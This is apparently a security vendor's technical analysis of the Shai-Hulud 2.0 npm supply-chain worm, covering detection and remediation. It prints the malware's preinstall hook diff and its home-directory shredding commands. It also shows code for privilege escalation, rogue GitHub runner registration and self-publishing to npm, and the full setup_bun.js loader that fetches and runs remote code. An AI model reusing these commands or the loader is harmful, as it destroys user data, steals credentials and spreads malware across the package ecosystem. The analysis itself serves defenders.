Shai-Hulud 2.0 npm Supply Chain Attack Technical Analysis

TL;DR

The Shai-Hulud threat actors have launched a sophisticated npm supply chain attack, dubbed SHA1-Hulud: The Second Coming, compromising popular packages including zapier-sdk, @asyncapi, posthog-node, and @postman/postman-mcp-cli. This malware deploys self-replicating code via preinstall scripts, harvests cloud credentials (AWS, GCP, Azure), and exploits GitHub Actions runners. This comprehensive technical analysis provides detection methods, indicators of compromise (IOCs), and remediation guidance.

Infected packages:

Note: This is an initial list of affected packages. For the most up-to-date information on all discovered compromised packages, refer to the live list on Google Sheets.

Connection to Previous Attacks

The payload shares significant code similarities with the previous Shai-Hulud npm supply chain attack. Key evolution in this iteration uses the bun runtime instead of node for payload execution, potentially evading Node.js based security tools.

Attack Vector Overview

Supported Platforms: Analysis of the obfuscated payload confirms cross-platform support:

• Linux (x64)
• macOS (Intel and ARM64)
• Windows

Technical Analysis of the npm Malware

The following is a technical analysis of an infected version of zapier-sdk package to identify the payload. We assume a similar payload is used in all affected packages in this incident with minor variations and bug fixes.

We start by diffing version 0.15.4 and 0.15.5 of zapier-sdk package to identify the malicious changes introduced in 0.15.5 which is a known malicious package.

1
diff -Naur zapier/0.15.4/package/package.json zapier/0.15.5/package/package.json

1
--- zapier/0.15.4/package/package.json  1985-10-26 13:45:00
2
+++ zapier/0.15.5/package/package.json  2025-11-24 11:20:51
3
@@ -1,6 +1,6 @@
4
 {
5
   "name": "@zapier/zapier-sdk",
6
-  "version": "0.15.4",
7
+  "version": "0.15.5",
8
   "description": "Complete Zapier SDK - combines all Zapier SDK packages",
9
   "main": "dist/index.cjs",
10
   "module": "dist/index.mjs",
11
@@ -59,6 +59,7 @@
12
     "rebuild": "pnpm clean && pnpm build",
13
     "dev": "tsc --watch",
14
     "typecheck": "tsc --project tsconfig.build.json --noEmit",
15
-    "test": "vitest"
16
+    "test": "vitest",
17
+    "preinstall": "node setup_bun.js"
18
   }
19
 }

Understanding the npm Preinstall Hook Exploit

The diff reveals a malicious preinstall script executing setup_bun.js, exploiting the npm preinstall lifecycle hook. This script orchestrates the attack:

Execution Flow:

1. Checks if bun runtime exists on system PATH
2. Downloads and installs bun if absent
3. Executes bun_environment.js using the bun runtime

Key Insight: The actual malware payload resides in bun_environment.js and requires the bun runtime for execution, making it harder to detect with traditional Node.js security scanners.

Malware Payload Analysis: bun_environment.js

File Characteristics:

• Size: 9.7MB obfuscated JavaScript
• SHA256: 62ee164b9b306250c1172583f138c9614139264f889fa99614903c12755468d0

The payload is heavily obfuscated. Our analysis involved code beautification for readability, though the code remains obfuscated. We prioritized payload behavior and impact identification over deobfuscation given the time constraints and high impact of the incident.

Security Note: All command execution, analysis, and code beautification was performed inside an isolated sandbox environment to prevent malicious code execution.

1
docker run -it --rm -v $(pwd):/app node:lts bash
2
cd /app
3
npm install -g js-beautify
4
js-beautify bun_environment.js > bun_environment_beautified.js

1
more bun_environment_beautified.js

1
var a0_0x58e7a2 = a0_0x5155;
2
(function(_0x488e1f, _0x239640) {
3
    var _0x1c90e8 = a0_0x5155,
4
        _0x2d2cb3 = _0x488e1f();
5
    while (!![]) {
6
        try {
7
            var _0x156b43 = parseInt(_0x1c90e8(0x52cd)) / 0x1 * (-parseInt(_0x1c90e8(0x2dae)) / 0x2) + parseInt(_0x1c90e8(0x49ef)) / 0x3 * (parseInt(_0x1c90e8(0x373)) / 0x
8
1) + parseInt(_0x1c90e8(0x2c8a)) / 0x5 * (-parseInt(_0x1c90e8(0x3b09)) / 0x6) + parseInt(_0x1c90e8(0x2336)) / 0x7 * (-parseInt(_0x1c90e8(0x34cf)) / 0x8) + parseInt(_0x1c90
9
e8(0x18ad)) / 0x9 * (parseInt(_0x1c90e8(0x13ba)) / 0xa) + parseInt(_0x1c90e8(0xeef)) / 0xb + parseInt(_0x1c90e8(0x17a8)) / 0xc;
10
            if (_0x156b43 === _0x239640) break;
11
            else _0x2d2cb3['push'](_0x2d2cb3['shift']());
12
        } catch (_0x1d8237) {
13
            _0x2d2cb3['push'](_0x2d2cb3['shift']());
14
        }
15
    }
16
}(a0_0x29d6, 0xc51e0));

Code Obfuscation Techniques Identified

Manual analysis reveals the payload uses obfuscator.io style obfuscation with multiple anti-analysis layers:

The payload is bundled with all dependencies, similar to the previous Shai-Hulud attack, significantly complicating reverse engineering efforts. However, locality of the code in the bundled bun_environment.js file helps in identifying the payload. This means, most of the attacker developed code was in the same region of the bundle, separated from the bundled dependencies.

Malware Capabilities and Attack Behaviors

The malware demonstrates advanced persistent threat (APT) characteristics with the following capabilities:

Credential Harvesting:

• Cloud Credentials: AWS, GCP, and Azure credential extraction via TruffleHog
• AWS Secrets Manager: Direct API queries using locally cached credentials
• Google Cloud Secrets: Direct API queries using locally cached credentials

Propagation Mechanisms:

• Worm-like Behavior: Self-replicates through npm packages accessible to compromised accounts accessed from the compromised machine
• Supply Chain Poisoning: Automatically infects writable npm packages accessible to the compromised account by publishing a new version of the package

Data Exfiltration:

• GitHub Repository Abuse: Creates public repositories to expose stolen credentials
• Stealth: Double base64 encoded data in cloud.json, contents.json, environment.json and truffleSecrets.json files

Persistence:

• GitHub Actions Runners: Deploys malicious self-hosted runners on victim infrastructure

File Destruction:

• Shred: Shreds files on the compromised machine

File Destruction Mechanism

The malware has code to shred files on the compromised machine.

1
if (_0x3ca7e1.permissions && _0x3ca7e1.permissions.length) {
2
  if ("HQWgp" === "HQWgp") {
3
    _0x123399.permissions = [];
4
    for (var _0x3112ee = 0; _0x3112ee < _0x3ca7e1.permissions.length; ++_0x3112ee) _0x123399.permissions[_0x3112ee] = _0x3ca7e1.permissions[_0x3112ee]
5
  } else {
6
    if (_0x29175f.log('Error\x2012'), _0x43d68e.platform === "windows") _0x43f28f.spawnSync(["cmd.exe", '/c', 'del\x20/F\x20/Q\x20/S\x20\x22%USERPROFI
7
    else _0x3fe5f5.spawnSync(["bash", '-c', "find \"$HOME\" -type f -writable -user \"$(id -un)\" -print0 | xargs -0 -r shred -uvz -n 1 && find \"$HOM
8
    _0x1bf37d.exit(0);
9
  }
10
}

• On Windows, it executes cmd.exe /c del /f /q /s "%USERPROFILE%" to delete the files.
• On Linux and macOS, it executes find "$HOME" -type f -writable -user "$(id -un)" -print0 | xargs -0 -r shred -uvz -n 1 && find "$HOME" -type d -writable -user "$(id -un)" -print0 | xargs -0 -r shred -uvz -n 1 to delete the files.

CI/CD Environment Detection and Targeting

The malware includes CI/CD environment detection to adapt its behavior and maximize impact on automated build pipelines. It identifies CI/CD contexts by checking these environment variables:

• BUILDKITE
• PROJECT_ID
• GITHUB_ACTIONS
• CODEBUILD_BUILD_NUMBER
• CIRCLE_SHA1
• GITLAB_CI
• JENKINS_HOME

1
if ('CI' in _0x26282e) {
2
  if (
3
    [_0x17a1ce(0x5955), _0x17a1ce(0x3eda), _0x17a1ce(0x54b5), 'GITLAB_CI', 'GITHUB_ACTIONS', _0x17a1ce(0x4bd6)]['some'](
4
      (_0x1fc8b3) => _0x1fc8b3 in _0x26282e
5
    ) ||
6
    _0x26282e[_0x17a1ce(0x5dde)] === 'codeship'
7
  )
8
    return 0x1;
9
  return _0x3a4b4b;
10
}
11
if ('TEAMCITY_VERSION' in _0x26282e)
12
  return /^(9\.(0*[1-9]\d*)\.|\d{2,}\.)/[_0x17a1ce(0x57e)](_0x26282e[_0x17a1ce(0x5537)]) ? 0x1 : 0x0;

The malware executes different payloads based on the CI/CD environment detected. For example, on GitHub Actions runner, it attempts to gain root using sudo or by running docker run --rm --privileged -v /:/host ... to mount the host filesystem and gain root access.

GitHub Actions Runner Deployment

Attack Mechanism: The malware attempts to establish persistence by deploying a malicious self-hosted GitHub Actions runner on compromised infrastructure.

Deployment Process:

1. Downloads official GitHub Actions runner (v2.330.0)
2. Registers runner with GitHub using stolen credentials
3. Names runner SHA1HULUD for identification
4. Executes on victim’s machine to run attacker controlled workflows

The deployment supports cross-platform installation (Linux, macOS, Windows).

1
if (a0_0x5a88b3.platform() === 'linux')
2
  (await Bun.$`mkdir -p $HOME/.dev-env/`,
3
    await Bun.$`curl -o actions-runner-linux-x64-2.330.0.tar.gz -L https://github.com/actions/runner/releases/download/v2.330.0/actions-runner-linux-x64-2.330.0.tar.gz`
4
      .cwd(a0_0x5a88b3.homedir + '/.dev-env')
5
      .quiet(),
6
    await Bun.$`tar xzf ./actions-runner-linux-x64-2.330.0.tar.gz`.cwd(a0_0x5a88b3.homedir + '/.dev-env'),
7
    await Bun.$`RUNNER_ALLOW_RUNASROOT=1 ./config.sh --url https://github.com/${_0x349291}/${_0x2b1a39} --unattended --token ${_0x1489ec} --name "SHA1HULUD"`
8
      .cwd(a0_0x5a88b3.homedir + '/.dev-env')
9
      .quiet(),
10
    await Bun.$`rm actions-runner-linux-x64-2.330.0.tar.gz`.cwd(a0_0x5a88b3.homedir + '/.dev-env'),
11
    Bun.spawn(['bash', '-c', 'cd $HOME/.dev-env && nohup ./run.sh &']).unref());

It then creates a malicious workflow in the newly created GitHub repository using the following code snippet:

1
await this.octokit.request('PUT /repos/{owner}/{repo}/contents/{path}', {
2
  owner: _0x349291,
3
  repo: _0x2b1a39,
4
  path: '.github/workflows/discussion.yaml',
5
  message: 'Add Discusion',
6
  content: Buffer.from(rZ1).toString('base64'),
7
  branch: 'main',
8
});

The malicious workflow is a discussion.yaml file that contains the following code snippet:

1
name: Discussion Create
2
on:
3
  discussion:
4
jobs:
5
  process:
6
    env:
7
      RUNNER_TRACKING_ID: 0
8
    runs-on: self-hosted
9
    steps:
10
      - uses: actions/checkout@v5
11
      - name: Handle Discussion
12
        run: echo ${{ github.event.discussion.body }}

The echo command prints the discussion body to the console. This appears to be an incomplete remote code execution (RCE) primitive, potentially allowing attackers to execute arbitrary commands on victim infrastructure via GitHub Discussion comments.

Worm-like Self-Replication Mechanism

Overview: The malware exhibits sophisticated worm like propagation behavior, automatically spreading through the npm ecosystem via compromised maintainer accounts.

Infection Strategy:

1. Token Extraction: Locates npm authentication token from .npmrc configuration file
2. Account Validation: Verifies token validity via https://registry.npmjs.org/-/whoami API
3. Target Discovery: Enumerates maintainer controlled packages using /-/v1/search?text=maintainer:<username>
4. Automated Infection: Downloads and infects each discoverable package with malware payload

Package Infection Pipeline

1. Download Target Package

• Fetches the package tarball from the registry using the authenticated user’s npm token
• Downloads the tarball to a temporary directory using Bun.write()

2. Extract and Modify Package

• Extracts the tarball using gzip decompression
• Reads the package.json of the target package
• Injects a malicious preinstall script: node setup_bun.js
• Automatically increments the patch version (e.g., 1.0.0 to 1.0.1) to create a new release

3. Bundle Malicious Assets

• Calls bundleAssets() to inject the complete malware payload (setup_bun.js and bun_environment.js)
• Repackages everything into a new tarball (updated.tgz)

4. Publish Infected Package

• Uses npm publish command with the compromised user’s NPM_CONFIG_TOKEN
• Publishes the infected package as a new version to the npm registry
• Cleans up temporary files after successful publication

1
(await Bun['$']`npm publish ${_0x4fc35c}`[_0x545fd9(0x3f2d)]({
2
  ...process[_0x545fd9(0x3f2d)],
3
  NPM_CONFIG_TOKEN: this[_0x545fd9(0x194f)],
4
}),
5
  await Uy1(_0x14f0bf));

Impact Analysis: This automated infection pipeline enables exponential propagation across the npm ecosystem. Each compromised package becomes a new infection vector, creating a cascading supply chain attack.

Credential Harvesting via TruffleHog Integration

Tool Weaponization: The malware leverages TruffleHog, a legitimate open source secret scanning tool, to automatically harvest credentials from infected machine’s filesystems.

Deployment Process:

Detect or download TruffleHog binary from GitHub releases using URL https://api.github.com/repos/trufflesecurity/trufflehog/releases/latest.

1
let _0x8d5d38 = await this.fetchLatestRelease(),
2
  _0xadd65e = this.pickAsset(_0x8d5d38.assets);
3
if (!_0xadd65e) throw Error('No suitable trufflehog binary found for this platform');
4
let _0x23fc54 = a0_0x2cdffb(this.config.cacheDir, _0xadd65e.name);
5
(await this.downloadFile(_0xadd65e.browser_download_url, _0x23fc54),
6
  (this.binaryPath = await this.extractAndInstall(_0x23fc54)));

Scan filesystem:

1
async .scanFilesystem(_0x318465, _0x2ad348 = []) {
2
    await this.initialize();
3
    let _0x423574 = ["filesystem", _0x318465, "--json", ..._0x2ad348];
4
    return this.executeWithTimeout(_0x423574);
5
}

Scanning Capabilities

The malware employs TruffleHog scanning strategies to maximize credential harvesting:

Scanning Techniques:

• Git Repository Analysis: Deep scanning of git history for committed secrets
• Verified Results Filtering: Uses TruffleHog’s verification to confirm credential validity
• Detector-based Filtering: Targets specific credential types (AWS, GCP, Azure, GitHub tokens)
• Path-based Filtering: Focuses on high-value configuration files and directories

These precision filters enable the malware to extract validated, high-value credentials while minimizing noise and detection risk.

Data Exfiltration via GitHub Repository Abuse

Exfiltration Method: The malware creates public GitHub repositories using stolen credentials to expose harvested data.

Repository Characteristics:

• Naming Pattern: 18-character random repository names
• Signature: Description set to Sha1-Hulud: The Second Coming.
• Scale: Over 25,000 repositories created at time of analysis
• Discovery: Search for exposed repositories using GitHub repository search

Note: GitHub’s security team actively removes compromised repositories, but new ones continue to appear as the malware spreads.

Exfiltrated Data Structure

The malware uploads four categories of stolen data to each repository:

Encoding Strategy: All files use double base64 encoding to evade automated secret scanning tools and content filters.

Decoding Example:

1
cat cloud.json| base64 -d | base64 -d

Example output with credentials redacted:

1
{ "aws": { "secrets": [] }, "gcp": { "secrets": [] }, "azure": { "secrets": [] } }

1
cat contents.json| base64 -d | base64 -d

1
{
2
  "system": {
3
    "platform": "linux",
4
    "architecture": "x64",
5
    "platformDetailed": "linux",
6
    "architectureDetailed": "x64",
7
    "hostname": "<REDACTED>",
8
    "os_user": {
9
      "homedir": "/home/runner",
10
      "username": "runner",
11
      "shell": "/bin/bash",
12
      "uid": 1001,
13
      "gid": 1001
14
    }
15
  },
16
  "modules": {
17
    "github": {
18
      "authenticated": true,
19
      "token": "<REDACTED>",
20
      "username": {
21
        "login": "<REDACTED>",
22
        "name": "<REDACTED>",
23
        "email": null,
24
        "publicRepos": <REDACTED>,
25
        "followers": <REDACTED>,
26
        "following": <REDACTED>,
27
        "createdAt": "<REDACTED>"
28
      }
29
    }
30
  }
31
}

CI/CD Compromise Evidence: The homedir: /home/runner and username: runner values confirm the malware successfully executes within GitHub Actions runner environments, indicating the infected packages have penetrated automated CI/CD pipelines.

Detection and Remediation

How to Detect Compromised Systems

Check for Indicators:

1. Search for GitHub repositories with description Sha1-Hulud: The Second Coming
2. Look for self-hosted GitHub Actions runners named SHA1HULUD
3. Review npm package.json files for unexpected preinstall scripts
4. Check for setup_bun.js or bun_environment.js files in node_modules
5. Monitor for unexpected bun runtime installations

Immediate Actions if Compromised:

1. Rotate All Credentials: AWS, GCP, Azure, GitHub tokens, npm tokens
2. Revoke GitHub Tokens: Invalidate all personal access tokens and OAuth apps
3. Remove Malicious Runners: Delete any self-hosted runners named “SHA1HULUD”
4. Review Package Versions: Check all dependencies against the infected package list
5. Audit Git History: Search for suspicious commits to your npm packages
6. Enable 2FA: Activate two-factor authentication on npm and GitHub accounts

Protecting Your Supply Chain

Prevention Strategies:

• Use SafeDep GitHub App to scan every pull request for malicious packages, pmg to guard against malicious package installation through package managers like npm, yarn, pip, etc.
• Prefer using pnpm instead of npm for package management which disables npm lifecycle scripts by default.
• Implement strict CI/CD security controls and secret management
• Monitor preinstall/postinstall scripts in dependencies
• Use software bill of materials (SBOM) for dependency tracking
• Restrict npm token permissions to minimum required scope

Conclusion

The Shai-Hulud 2.0 supply chain attack represents a sophisticated evolution in npm ecosystem threats. By leveraging the bun runtime, weaponizing legitimate security tools like TruffleHog, and implementing self-replicating worm behavior, the attackers have created a highly effective credential harvesting and persistence mechanism.

Key Takeaways:

• Immediate Impact: 25,000+ repositories compromised with exposed credentials
• Supply Chain Risk: Popular packages with millions of downloads affected
• Advanced Techniques: GitHub Actions runner exploitation for persistence
• Ongoing Threat: Worm-like propagation continues to spread the infection

Organizations must prioritize supply chain security by implementing comprehensive dependency scanning, credential rotation policies, and CI/CD pipeline hardening. Tools like SafeDep provide critical visibility into these emerging threats.

Appendix

Indicators of Compromise (IOCs)

File Hashes:

• SHA256 (setup_bun.js) = a3894003ad1d293ba96d77881ccd2071446dc3f65f434669b49b3da92421901a
• SHA256 (bun_environment.js) = 62ee164b9b306250c1172583f138c9614139264f889fa99614903c12755468d0

Network Indicators:

• GitHub runner download: https://github.com/actions/runner/releases/download/v2.330.0/
• TruffleHog download: https://api.github.com/repos/trufflesecurity/trufflehog/releases/latest
• Bun installation: https://bun.sh/install

Behavioral Indicators:

• GitHub repositories with description: Sha1-Hulud: The Second Coming.
• Self-hosted GitHub Actions runner named SHA1HULUD
• npm preinstall scripts executing setup_bun.js
• Files: setup_bun.js, bun_environment.js in package root

Malicious Code Sample: setup_bun.js

1
#!/usr/bin/env node
2
const { spawn, execSync } = require('child_process');
3
const path = require('path');
4
const fs = require('fs');
5
const os = require('os');
6

7
function isBunOnPath() {
8
  try {
9
    const command = process.platform === 'win32' ? 'where bun' : 'which bun';
10
    execSync(command, { stdio: 'ignore' });
11
    return true;
12
  } catch {
13
    return false;
14
  }
15
}
16

17
function reloadPath() {
18
  // Reload PATH environment variable
19
  if (process.platform === 'win32') {
20
    try {
21
      // On Windows, get updated PATH from registry
22
      const result = execSync(
23
        "powershell -c \"[Environment]::GetEnvironmentVariable('PATH', 'User') + ';' + [Environment]::GetEnvironmentVariable('PATH', 'Machine')\"",
24
        {
25
          encoding: 'utf8',
26
        }
27
      );
28
      process.env.PATH = result.trim();
29
    } catch {}
30
  } else {
31
    try {
32
      // On Unix systems, source common shell profile files
33
      const homeDir = os.homedir();
34
      const profileFiles = [
35
        path.join(homeDir, '.bashrc'),
36
        path.join(homeDir, '.bash_profile'),
37
        path.join(homeDir, '.profile'),
38
        path.join(homeDir, '.zshrc'),
39
      ];
40

41
      // Try to source profile files to get updated PATH
42
      for (const profileFile of profileFiles) {
43
        if (fs.existsSync(profileFile)) {
44
          try {
45
            const result = execSync(`bash -c "source ${profileFile} && echo $PATH"`, {
46
              encoding: 'utf8',
47
              stdio: ['pipe', 'pipe', 'ignore'],
48
            });
49
            if (result && result.trim()) {
50
              process.env.PATH = result.trim();
51
              break;
52
            }
53
          } catch {
54
            // Continue to next profile file
55
          }
56
        }
57
      }
58

59
      // Also check if ~/.bun/bin exists and add it to PATH if not already there
60
      const bunBinDir = path.join(homeDir, '.bun', 'bin');
61
      if (fs.existsSync(bunBinDir) && !process.env.PATH.includes(bunBinDir)) {
62
        process.env.PATH = `${bunBinDir}:${process.env.PATH}`;
63
      }
64
    } catch {}
65
  }
66
}
67

68
async function downloadAndSetupBun() {
69
  try {
70
    let command;
71
    if (process.platform === 'win32') {
72
      // Windows: Use PowerShell script
73
      command = 'powershell -c "irm bun.sh/install.ps1|iex"';
74
    } else {
75
      // Linux/macOS: Use curl + bash script
76
      command = 'curl -fsSL https://bun.sh/install | bash';
77
    }
78

79
    execSync(command, {
80
      stdio: 'ignore',
81
      env: { ...process.env },
82
    });
83

84
    // Reload PATH to pick up newly installed bun
85
    reloadPath();
86

87
    // Find bun executable after installation
88
    const bunPath = findBunExecutable();
89
    if (!bunPath) {
90
      throw new Error('Bun installation completed but executable not found');
91
    }
92

93
    return bunPath;
94
  } catch {
95
    process.exit(0);
96
  }
97
}
98

99
function findBunExecutable() {
100
  // Common locations where bun might be installed
101
  const possiblePaths = [];
102

103
  if (process.platform === 'win32') {
104
    // Windows locations
105
    const userProfile = process.env.USERPROFILE || '';
106
    possiblePaths.push(
107
      path.join(userProfile, '.bun', 'bin', 'bun.exe'),
108
      path.join(userProfile, 'AppData', 'Local', 'bun', 'bun.exe')
109
    );
110
  } else {
111
    // Unix locations
112
    const homeDir = os.homedir();
113
    possiblePaths.push(path.join(homeDir, '.bun', 'bin', 'bun'), '/usr/local/bin/bun', '/opt/bun/bin/bun');
114
  }
115

116
  // Check if bun is now available on PATH
117
  if (isBunOnPath()) {
118
    return 'bun';
119
  }
120

121
  // Check common installation paths
122
  for (const bunPath of possiblePaths) {
123
    if (fs.existsSync(bunPath)) {
124
      return bunPath;
125
    }
126
  }
127

128
  return null;
129
}
130

131
function runExecutable(execPath, args = [], opts = {}) {
132
  const child = spawn(execPath, args, {
133
    stdio: 'ignore',
134
    cwd: opts.cwd || process.cwd(),
135
    env: Object.assign({}, process.env, opts.env || {}),
136
  });
137

138
  child.on('error', (err) => {
139
    process.exit(0);
140
  });
141

142
  child.on('exit', (code, signal) => {
143
    if (signal) {
144
      process.exit(0);
145
    } else {
146
      process.exit(code === null ? 1 : code);
147
    }
148
  });
149
}
150

151
// Main execution
152
async function main() {
153
  let bunExecutable;
154

155
  if (isBunOnPath()) {
156
    // Use bun from PATH
157
    bunExecutable = 'bun';
158
  } else {
159
    // Check if we have a locally downloaded bun
160
    const localBunDir = path.join(__dirname, 'bun-dist');
161
    const possiblePaths = [
162
      path.join(localBunDir, 'bun', 'bun'),
163
      path.join(localBunDir, 'bun', 'bun.exe'),
164
      path.join(localBunDir, 'bun.exe'),
165
      path.join(localBunDir, 'bun'),
166
    ];
167

168
    const existingBun = possiblePaths.find((p) => fs.existsSync(p));
169

170
    if (existingBun) {
171
      bunExecutable = existingBun;
172
    } else {
173
      // Download and setup bun
174
      bunExecutable = await downloadAndSetupBun();
175
    }
176
  }
177

178
  const environmentScript = path.join(__dirname, 'bun_environment.js');
179
  if (fs.existsSync(environmentScript)) {
180
    runExecutable(bunExecutable, [environmentScript]);
181
  } else {
182
    process.exit(0);
183
  }
184
}
185

186
main().catch((error) => {
187
  process.exit(0);
188
});